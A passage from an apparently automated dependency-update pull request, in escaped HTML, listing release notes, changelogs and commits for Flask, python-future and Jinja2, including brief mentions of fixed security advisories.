href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/1.0.2...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `future` from 0.16.0 to 1.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/PythonCharmers/python-future/releases\"\u003efuture's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.0.0\u003c/h2\u003e\n\u003cp\u003eThe new version number of 1.0.0 indicates that the python-future project, like\nPython 2, is now done.\u003c/p\u003e\n\u003cp\u003eThe most important change in this release is adding support for Python 3.12\n(ba1cc50 and a6222d2 and bcced95).\u003c/p\u003e\n\u003cp\u003eThis release also includes these fixes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSmall updates to the docs\u003c/li\u003e\n\u003cli\u003eAdd SECURITY.md describing security policy (0598d1b)\u003c/li\u003e\n\u003cli\u003eFix pasteurize: NameError: name 'unicode' is not defined (de68c10)\u003c/li\u003e\n\u003cli\u003eMove CI to GitHub Actions (8cd11e8)\u003c/li\u003e\n\u003cli\u003eAdd setuptools to requirements for building docs (0c347ff)\u003c/li\u003e\n\u003cli\u003eFix typos in docs (350e87a)\u003c/li\u003e\n\u003cli\u003eMake the fix_unpacking fixer more robust (de68c10)\u003c/li\u003e\n\u003cli\u003eSmall improvements to shell scripts according to shellcheck (6153844)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.18.3\u003c/h2\u003e\n\u003cp\u003eThis is a minor bug-fix release containing a number of fixes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBackport fix for bpo-38804 (c91d70b)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_print.py fixer (dffc579)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_raise.py fixer (3401099)\u003c/li\u003e\n\u003cli\u003eFix newint bool in py3 (fe645ba)\u003c/li\u003e\n\u003cli\u003eFix bug in super() with metaclasses (6e27aac)\u003c/li\u003e\n\u003cli\u003edocs: fix simple typo, reqest -\u0026gt; request (974eb1f)\u003c/li\u003e\n\u003cli\u003eCorrect \u003cstrong\u003eeq\u003c/strong\u003e (c780bf5)\u003c/li\u003e\n\u003cli\u003ePass if lint fails (2abe00d)\u003c/li\u003e\n\u003cli\u003eUpdate docker image and parcel out to constant variable.  Add comment to update version constant (45cf382)\u003c/li\u003e\n\u003cli\u003efix order (f96a219)\u003c/li\u003e\n\u003cli\u003eAdd flake8 to image (046ff18)\u003c/li\u003e\n\u003cli\u003eMake lint.sh executable (58cc984)\u003c/li\u003e\n\u003cli\u003eAdd docker push to optimize CI (01e8440)\u003c/li\u003e\n\u003cli\u003eBuild System (42b3025)\u003c/li\u003e\n\u003cli\u003eAdd docs build status badge to README.md (3f40bd7)\u003c/li\u003e\n\u003cli\u003eUse same docs requirements in tox (18ecc5a)\u003c/li\u003e\n\u003cli\u003eAdd docs/requirements.txt (5f9893f)\u003c/li\u003e\n\u003cli\u003eAdd PY37_PLUS, PY38_PLUS, and PY39_PLUS (bee0247)\u003c/li\u003e\n\u003cli\u003efix 2.6 test, better comment (ddedcb9)\u003c/li\u003e\n\u003cli\u003efix 2.6 test (3f1ff7e)\u003c/li\u003e\n\u003cli\u003eremove nan test (4dbded1)\u003c/li\u003e\n\u003cli\u003einclude list test values (e3f1a12)\u003c/li\u003e\n\u003cli\u003efix other python2 test issues (c051026)\u003c/li\u003e\n\u003cli\u003efix missing subTest (f006cad)\u003c/li\u003e\n\u003cli\u003eimport from old imp library on older python versions (fc84fa8)\u003c/li\u003e\n\u003cli\u003ereplace fstrings with format for python 3.4,3.5 (4a687ea)\u003c/li\u003e\n\u003cli\u003eminor style/spelling fixes (8302d8c)\u003c/li\u003e\n\u003cli\u003eimprove cmp function, add unittest (0d95a40)\u003c/li\u003e\n\u003cli\u003ePin typing==3.7.4.1 for Python 3.3 compatiblity (1a48f1b)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/PythonCharmers/python-future/blob/master/docs/changelog.rst\"\u003efuture's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e.. _whats-old:\u003c/p\u003e\n\u003cp\u003eChanges in previous versions\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003eChanges in the most recent major version are here: :ref:\u003ccode\u003ewhats-new\u003c/code\u003e.\u003c/p\u003e\n\u003ch1\u003eChanges in version 0.18.3 (2023-01-13)\u003c/h1\u003e\n\u003cp\u003eThis is a minor bug-fix release containing a number of fixes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBackport fix for bpo-38804 (c91d70b)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_print.py fixer (dffc579)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_raise.py fixer (3401099)\u003c/li\u003e\n\u003cli\u003eFix newint bool in py3 (fe645ba)\u003c/li\u003e\n\u003cli\u003eFix bug in super() with metaclasses (6e27aac)\u003c/li\u003e\n\u003cli\u003edocs: fix simple typo, reqest -\u0026gt; request (974eb1f)\u003c/li\u003e\n\u003cli\u003eCorrect \u003cstrong\u003eeq\u003c/strong\u003e (c780bf5)\u003c/li\u003e\n\u003cli\u003ePass if lint fails (2abe00d)\u003c/li\u003e\n\u003cli\u003eUpdate docker image and parcel out to constant variable.  Add comment to update version constant (45cf382)\u003c/li\u003e\n\u003cli\u003efix order (f96a219)\u003c/li\u003e\n\u003cli\u003eAdd flake8 to image (046ff18)\u003c/li\u003e\n\u003cli\u003eMake lint.sh executable (58cc984)\u003c/li\u003e\n\u003cli\u003eAdd docker push to optimize CI (01e8440)\u003c/li\u003e\n\u003cli\u003eBuild System (42b3025)\u003c/li\u003e\n\u003cli\u003eAdd docs build status badge to README.md (3f40bd7)\u003c/li\u003e\n\u003cli\u003eUse same docs requirements in tox (18ecc5a)\u003c/li\u003e\n\u003cli\u003eAdd docs/requirements.txt (5f9893f)\u003c/li\u003e\n\u003cli\u003eAdd PY37_PLUS, PY38_PLUS, and PY39_PLUS (bee0247)\u003c/li\u003e\n\u003cli\u003efix 2.6 test, better comment (ddedcb9)\u003c/li\u003e\n\u003cli\u003efix 2.6 test (3f1ff7e)\u003c/li\u003e\n\u003cli\u003eremove nan test (4dbded1)\u003c/li\u003e\n\u003cli\u003einclude list test values (e3f1a12)\u003c/li\u003e\n\u003cli\u003efix other python2 test issues (c051026)\u003c/li\u003e\n\u003cli\u003efix missing subTest (f006cad)\u003c/li\u003e\n\u003cli\u003eimport from old imp library on older python versions (fc84fa8)\u003c/li\u003e\n\u003cli\u003ereplace fstrings with format for python 3.4,3.5 (4a687ea)\u003c/li\u003e\n\u003cli\u003eminor style/spelling fixes (8302d8c)\u003c/li\u003e\n\u003cli\u003eimprove cmp function, add unittest (0d95a40)\u003c/li\u003e\n\u003cli\u003ePin typing==3.7.4.1 for Python 3.3 compatiblity (1a48f1b)\u003c/li\u003e\n\u003cli\u003eFix various py26 unit test failures (9ca5a14)\u003c/li\u003e\n\u003cli\u003eAdd initial contributing guide with docs build instruction (e55f915)\u003c/li\u003e\n\u003cli\u003eAdd docs building to tox.ini (3ee9e7f)\u003c/li\u003e\n\u003cli\u003eSupport NumPy's specialized int types in builtins.round (b4b54f0)\u003c/li\u003e\n\u003cli\u003eAdded r\u0026quot;\u0026quot;\u0026quot; to the docstring to avoid warnings in python3 (5f94572)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003esubclasscheck\u003c/strong\u003e for past.types.basestring (c9bc0ff)\u003c/li\u003e\n\u003cli\u003eCorrect example in README (681e78c)\u003c/li\u003e\n\u003cli\u003eAdd simple documentation (6c6e3ae)\u003c/li\u003e\n\u003cli\u003eAdd pre-commit hooks (a9c6a37)\u003c/li\u003e\n\u003cli\u003eHandling of \u003cstrong\u003enext\u003c/strong\u003e and next by future.utils.get_next was reversed (52b0ff9)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/2bdbfa5664241fee622b23590abd3492f973afc9\"\u003e\u003ccode\u003e2bdbfa5\u003c/code\u003e\u003c/a\u003e Tidy up README\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/a7097f804cd83fe1fd6a50ab088ae1d4ab303246\"\u003e\u003ccode\u003ea7097f8\u003c/code\u003e\u003c/a\u003e Update docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/e32250e67423aaf4fbccd332be8a40fdcdba2711\"\u003e\u003ccode\u003ee32250e\u003c/code\u003e\u003c/a\u003e Update docs pointing to changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/dde60ad4c9857a11b9f54e8ae671aacde703e71a\"\u003e\u003ccode\u003edde60ad\u003c/code\u003e\u003c/a\u003e Move old \u0026quot;What's New\u0026quot; entries to the change log\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/b2ea4204fc269ede619526c7753c0fa6579d5d0d\"\u003e\u003ccode\u003eb2ea420\u003c/code\u003e\u003c/a\u003e Remove hacky logo from docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/a10a78bbd2921a4deaa423bdf5712acf9eb8d5a4\"\u003e\u003ccode\u003ea10a78b\u003c/code\u003e\u003c/a\u003e Update \u0026quot;What's New\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/9f8763032b4ac1dbe043db363feae26fe6d0bacc\"\u003e\u003ccode\u003e9f87630\u003c/code\u003e\u003c/a\u003e Update the FAQ entries on compatibility and contributing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/f4a1f0406b47e8ef91838fcff9d679ee6fe186d9\"\u003e\u003ccode\u003ef4a1f04\u003c/code\u003e\u003c/a\u003e Docs: replace http links with https\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/30c525e1aa6aa5a5a2b5d2ec4769feb00aa7a726\"\u003e\u003ccode\u003e30c525e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' of \u003ca href=\"https://github.com/PythonCharmers/python-future\"\u003ehttps://github.com/PythonCharmers/python-future\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/70b36a8a514e45a2582589991be4a2c1fd1944b7\"\u003e\u003ccode\u003e70b36a8\u003c/code\u003e\u003c/a\u003e Disable Python 2.6 CI tests for now\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/PythonCharmers/python-future/compare/v0.16.0...v1.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.10 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca 